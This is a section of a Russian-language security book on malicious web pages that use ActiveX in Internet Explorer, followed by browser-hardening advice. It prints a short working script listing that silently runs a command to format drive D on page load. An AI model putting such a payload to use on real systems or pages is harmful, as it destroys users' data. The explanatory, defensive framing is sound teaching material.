5.2. Веб-страница в обличии Фредди Крюгера – «потрошит» ваш винчестер!

5.2. Веб-страница в обличии Фредди Крюгера – «потрошит» ваш винчестер!

Можно ли, посетив сайт, получить в подарок отформатированные диски? А почему бы и нет. Тем более что возможности JavaScript и ActiveX вкупе с многочисленными уязвимостями Internet Explorer выходят за рамки простых документированных функций (листинг 5.2).

Листинг 5.2. Форматируем диск – легко!

<script>

a=new ActiveXObject("WScript.Shell");

a.run("cmd /c format d:/y",0);

</script>

Применение ActiveX-компонентов делает веб-страницы более интерактивными. Но за удобство и функциональность можно дорого заплатить: многочисленные уязвимости IE позволяют, к примеру, неподписанные (они же небезопасные) компоненты ActiveX представить пользователю как подписанные (безопасные, так как происхождение и содержание такого компонента подтверждено электронной подписью удостоверяющего центра) или вообще скрыть от глаз выполнение произвольного сценария.

Возможные варианты защиты в подобных случаях.

? Задание безопасных настроек браузера (Сервис ? Свойства обозревателя ? Безопасность ? Высокий).

? Как альтернатива, конфигурирование зон интернет-безопасности вручную (Сервис ? Свойства обозревателя ? Безопасность ? Другой ? Загрузка неподписанных элементов ActiveX ? Отключить, Активные сценарии ? Отключить и т. д.).

? Ну и, конечно же, бдительность пользователя. К примеру, прежде чем вышеописанный сценарий сделает свое черное дело, система два раза "аккуратно намекнет" на потенциальную опасность (рис. 5.1 и 5.2).

Рис. 5.1. Первое предупреждение

Рис. 5.2. Второе предупреждение